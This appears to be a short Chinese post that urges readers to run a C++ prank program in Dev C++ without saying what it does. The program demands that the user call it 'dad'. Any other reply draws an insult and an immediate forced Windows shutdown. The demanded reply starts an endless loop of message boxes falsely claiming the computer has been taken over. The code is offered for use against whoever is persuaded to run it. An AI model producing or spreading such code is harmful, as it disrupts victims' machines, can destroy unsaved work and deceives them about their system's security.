相信我,在dev c++里启动!!!!!!!!!!!!!!!!
正文:
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int a=0;
string h;
int main(){
cout<<"叫我爸爸!不叫的话......"<<endl;
cin>>h;
if(h=="爹"||h=="爸爸"||h=="爸"||h=="die"||h=="ba"||h=="baba"){
cout<<"诶~~~~~60下"<<endl;
a=30;
}else{
cout<<"尼玛"<<endl;
Sleep(500);
system("shutdown /s /t 0");
}
for(int i=1;i<=a;i++){
MessageBox(NULL,"点60下就可以","。。。",MB_OK);
cout<<"假的,哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈!!!!!!点无限下吧!!!!!!!!!!!";
a+=1;
MessageBox(NULL,"你的电脑已被我控制","提示",MB_OK);
}
cout<<"假的,哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈!!!!!!";
MessageBox(NULL,"你的电脑已被我控制","提示",MB_OK);
return 0;
}